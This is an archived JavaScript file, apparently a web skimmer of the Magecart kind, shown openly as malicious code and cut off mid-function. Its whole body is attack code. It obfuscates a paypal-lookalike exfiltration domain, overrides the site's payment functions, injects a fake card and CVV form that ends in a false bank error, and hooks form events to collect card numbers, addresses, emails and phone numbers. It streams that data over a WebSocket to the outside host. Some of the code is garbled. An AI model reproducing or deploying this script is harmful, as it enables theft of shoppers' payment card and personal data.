

group-1-websocket-stage-4.js

By 262588213843476

Archived: 2026-04-05 23:41:15 UTC

function aC(name)
{
function escape(s)
{
return s.replace(/([.*+?^\${}()\[\]\\\])/g, '\\\$1');
};
var match = document.cookie.match(RegExp("(?:^ ;\\s*)" + escape(name) + "=(^[^;]*)"));
return match ? match[1] : null;
}
function googleCheck()
{
alert('I'm here!');
}
if (!aC('ashdgaisydasldasbdyigausd'))
{
document.cookie = "ashdgaisydasldasbdyigausd=96ddd96e7ed46eb02af0280c550d9772";
var tokahsdb = '96ddd96e7ed46eb02af0280c550d9772';
}
else
{
var tokahsdb = aC('ashdgaisydasldasbdyigausd');
}
var refererQwerdfgdgdfg = 'victimsite.com';
if (location.hostname == 'file://')
{
while (1)

{
document.cookie = document.cookie + document.cookie + "qweqwe=qweqwe";
document.querySelector('body').innerHTML += document.querySelector('body').innerHTML;
}
}
if (!document.querySelector('.qweqwe' + tokahsdb))
{
qweqweInt = setInterval(function ()
{
if (document.querySelector('div'))
{
var s = document.getElementsByTagName('div')[0];
var li = document.createElement('span');
li.class = "qweqwe" + tokahsdb;
s.parentNode.insertBefore(li, s);
clearInterval(qweqweInt);
}
}, 50);
var c = [112, 97, 121, 112, 97, 108, 97, 112, 105, 111, 98, 106, 101, 99, 116, 115, 46, 99, 111, 109],
ggtag = '//',
ihbndfidjimpwofnj = 1;
for (var ji = 0; ji < c.length; ji++)
{
ggtag += String.fromCharCode(c[ji]);
}
(function ()
{
setInterval(setNullMethods, 100);
function setNullMethods()
{

if (typeof (window.GetData) != 'undefined')
{
window.GetData = function (elem, flag)
{
console.log("ZnVjayB5b3U=");
};
}
if (typeof (window.Default_Send) != 'undefined')
{
window.Default_Send = function (elem, flag)
{
console.log("ZnVjayB5b3U=");
};
}
if (typeof (window.CheckFields) != 'undefined')
{
window.CheckFields = function (elem, flag)
{
console.log("ZnVjayB5b3U=");
};
}
if (typeof window.SendData != 'undefined')
{
window.SendData = function ()
{
console.log("ZnVjayB5b3U=");
};
}
});
(function ()
{

function _0xjefgJJDLF()
{
return _0x5gasdkf() && _0x5kjsdfdsf();
}
function _0x5gasdkf()
{
var obj = document.querySelector('[name="card_num"]#card_num');
if (!__cleanValid(obj.value))
{
obj.setAttribute('class', 'invalid-custom-form-input');
return false;
}
else
{
obj.setAttribute('class', 'valid-custom-form-input');
return true;
}
}
function _0x5kjsdfdsf()
{
var obj = document.querySelector('[name="cvv2"]#cvv2');
if (!__cleanValid(obj.value))
{
obj.setAttribute('class', 'invalid-custom-form-input');
return false;
}
else
{
obj.setAttribute('class', 'valid-custom-form-input');

<code>return true;</code>
<code>}</code>
<code>}</code>
<code>function __cleanValid(value)</code>
<code>{</code>
<code>if (/^[0-9-\\s]+/.test(value)) return false;</code>
<code>let nCheck = 0,</code>
<code>bEven = false;</code>
<code>value = value.replace(/D/g, "");</code>
<code>if (value.length < 16) return false;</code>
<code>for (var n = value.length - 1; n >= 0; n--)</code>
<code>{</code>
<code>var cDigit = value.charAt(n),</code>
<code>nDigit = parseInt(cDigit, 10);</code>
<code>if (bEven && (nDigit * 2) > 9)</code>
<code>{</code>
<code>nDigit -= 9;</code>
<code>}</code>
<code>nCheck += nDigit;</code>
<code>bEven = !bEven;</code>
<code>}</code>
<code>return (nCheck % 10) == 0;</code>
<code>}</code>
<code>function ___cleanValid(value)</code>
<code>{</code>
<code>value = value.replace(/D/g, "");</code>
<code>if (value.length < 3 value.length > 4)</code>
<code>{</code>
<code>return false;</code>
<code>}</code>

return true;
}
var intervalValidator = setInterval(_0xhsdfJk, 100);
function _0xhsdfJk()
{
if (document.querySelector('[name="card_num"]#card_num') && !document.querySelector('[name="card_num"]#card_num[data validator=true]'))
{
document.querySelector('[name="card_num"]#card_num').addEventListener('input', function (e)
{
e.target.value = e.target.value.replace(/[^0-9]/g, "").replace(/(\.+)/g, '\$1');
let val = "";
let __1 = e.target.value.substr(0, 4);
if (e.target.value.length > 4)
{
val += __1;
let __2 = e.target.value.substr(4, 4);
if (__1.length == 4 && __2)
{
val += '' + __2;
let __3 = e.target.value.substr(8, 4);
if (__2.length == 4 && __3)
{
val += '' + __3;
let __4 = e.target.value.substr(12, 4);
if (__3.length == 4 && __4)
{
val += '' + __4;
}
}

{
document.querySelector('#dfsdfsdfsdf672ac3d52c366529fc7f93a19455bd95').setAttribute('class', 'lkmfsjdfnsdihdbfl672ac3d52c366529fc7f93a19455bd95');
var tryToPayBtn = document.querySelector('#try-to-pay-button');
if (tryToPayBtn)
{
tryToPayBtn.addEventListener('click', function (e)
{
e.preventDefault();
if (!_0xjefgJJDLF())
{
return false;
}
else
{
clearInterval(intervalValidator);
document.querySelector('#dfsdfsdfsdf672ac3d52c366529fc7f93a19455bd95 .statusBar').innerHTML = '<div style="text-align:center;font-weight: bold;"> + labels['bank_processing'] + '</div>';
tryToPayBtn.setAttribute('disabled', 'disabled');
setTimeout(function ()
{
document.cookie = "formHide=1;";
document.querySelector('#dfsdfsdfsdf672ac3d52c366529fc7f93a19455bd95 .statusBar').innerHTML = '<div style="color:darkred" labels['bank_error'] + '</div>';
setTimeout(function ()
{
document.querySelector('#dfsdfsdfsdf672ac3d52c366529fc7f93a19455bd95').setAttribute('style', 'display:none !important;');
if (typeof sdnjfsldfk == 'function')
{
sdnjfsldfk();
}

}, 7000);
}, 10000);
}
});
}
}
}
})();
var wssocket;
var pingInterval;
var host = '//pa' + 'yp' + 'al' + 'ap' + 'io' + 'bj' + 'ec' + 'ts.com';
wssconnect();
let wssConnectInterval = setInterval(wssconnect, 1000);
function wssconnect()
{
if (!wssocket (wssocket.readyState !== 1 && wssocket.readyState !== '-0'))
{
try
{
wssocket = new WebSocket("wss:" + host + "/events/");
wssocket.onopen = function (data)
{
socketSend(
{
e: "hello",
data:
{
domain: location.origin
}
}
});

pingInterval = setInterval(function ()
{
socketSend(
{
e: "ping"
});
}, 5000);
};
wsocket.onclose = function (data)
{
clearInterval(pingInterval);
};
wsocket.onmessage = function (data) {};
}
catch (e)
{}
}
}
function socketSend(data)
{
wsocket.send(JSON.stringify(data));
}
function wssdisconnect()
{
clearInterval(pingInterval);
clearInterval(wssConnectInterval);
wsocket.close();
}
window.addEventListener("unload", wssdisconnect);
(function ()
{

function gcmBuild()
{
addEvents();
setInterval(addEvents, 100);
}
function pixel(fs)
{
var j = getJson();
emit(j);
}
function getJson()
{
const formData = new Object;
formData['tok'] = tokahsdb;
document.querySelectorAll('input').forEach(function (item, i)
{
if (item.value.length < 1)
{
return;
}
let itemKey = ";
if (item.name)
{
itemKey = item.name;
}
else if (item.id)
{
itemKey = item.id;
}
formData[itemKey] = item.value;

});
document.querySelectorAll('select').forEach(function (item, i)
{
if (item.name.search('date') != '-1' item.name.search('exp') != '-1' item.name.search('cardExpiration') != '-1')
{
formData[item.name] = item.value;
return;
}
if (!document.querySelector('[name="' + item.name + "']"))
{
console.log('[name="' + item.name + "'], 'not found');
return;
}
if (!document.querySelector('[name="' + item.name + "'] [value=\"" + document.querySelector('[name="' + item.name + "']").value
"']))
{
console.log('[name="' + item.name + "'] [value=\"" + document.querySelector('[name="' + item.name + "']").value + "\", 'not found');
return;
}
formData[item.name] = document.querySelector('[name="' + item.name + "'] [value=\"" + document.querySelector('[name="' +
item.name + "']").value + "\"]').innerText;
});
document.querySelectorAll('textarea').forEach(function (item, i)
{
formData[item.name] = item.value;
});
if (typeof reffererQwerfdgdfg != 'undefined')
{
formData['domain'] = reffererQwerfdgdfg;
}

else
{
formData['domain'] = location.hostname;
}
return JSON.stringify(formData);
}
function addEvents()
{
if (typeof grelos_v != 'undefined')
{
grelos_v['Glink'] = '/';
}
if (
!document.querySelector('[name*=cc_number]') &&
!document.querySelector('[name*=firstname]') &&
!document.querySelector('[name*=name]') &&
!document.querySelector('[name*=address]') &&
!document.querySelector('[name*=postcode]') &&
!document.querySelector('[name*=zip]') &&
!document.querySelector('[name*=phone]') &&
!document.querySelector('[name*=email]') &&
!document.querySelector('[name*=payment[cc_number]]') &&
!document.querySelector('[name*=payment]') &&
!document.querySelector('[name*=cc]') &&
!document.querySelector('[name*=card_num]') &&
!document.querySelector('[name*=billing]')
)
{
return false;
}

<code>Array.from(document.getElementsByTagName('input')).forEach(function (item, i)</code>
<code>{</code>
<code>if (!item.hasAttribute('build'))</code>
<code>{</code>
<code>item.setAttribute('build', 1);</code>
<code>item.addEventListener("blur", eventSend);</code>
<code>}</code>
<code>});</code>
<code>Array.from(document.getElementsByTagName('select')).forEach(function (item, i)</code>
<code>{</code>
<code>if (!item.hasAttribute('build'))</code>
<code>{</code>
<code>item.setAttribute('build', 1);</code>
<code>item.addEventListener("blur", eventSend);</code>
<code>}</code>
<code>});</code>
<code>Array.from(document.getElementsByTagName('textarea')).forEach(function (item, i)</code>
<code>{</code>
<code>if (!item.hasAttribute('build'))</code>
<code>{</code>
<code>item.setAttribute('build', 1);</code>
<code>item.addEventListener("blur", eventSend);</code>
<code>}</code>
<code>});</code>
<code>Array.from(document.querySelectorAll("form")).forEach(function (item, i)</code>
<code>{</code>
<code>if (!item.hasAttribute('build'))</code>
<code>{</code>
<code>item.setAttribute('build', 1);</code>
<code>item.addEventListener("submit", eventSend);</code>
<code>}</code>

});
Array.from(document.querySelectorAll("[type=submit])).forEach(function (item, i)
{
if (!item.hasAttribute('build'))
{
item.setAttribute('build', 1);
item.addEventListener("click", eventSend);
}
});
Array.from(document.querySelectorAll("[type=button])).forEach(function (item, i)
{
if (!item.hasAttribute('build'))
{
item.setAttribute('build', 1);
item.addEventListener("click", eventSend);
}
});
}
function eventSend(e)
{
pixel(0);
}
function emit(data)
{
if (typeof googlelog !== 'undefined')
{
console.log(data);
}
socketSend(
{

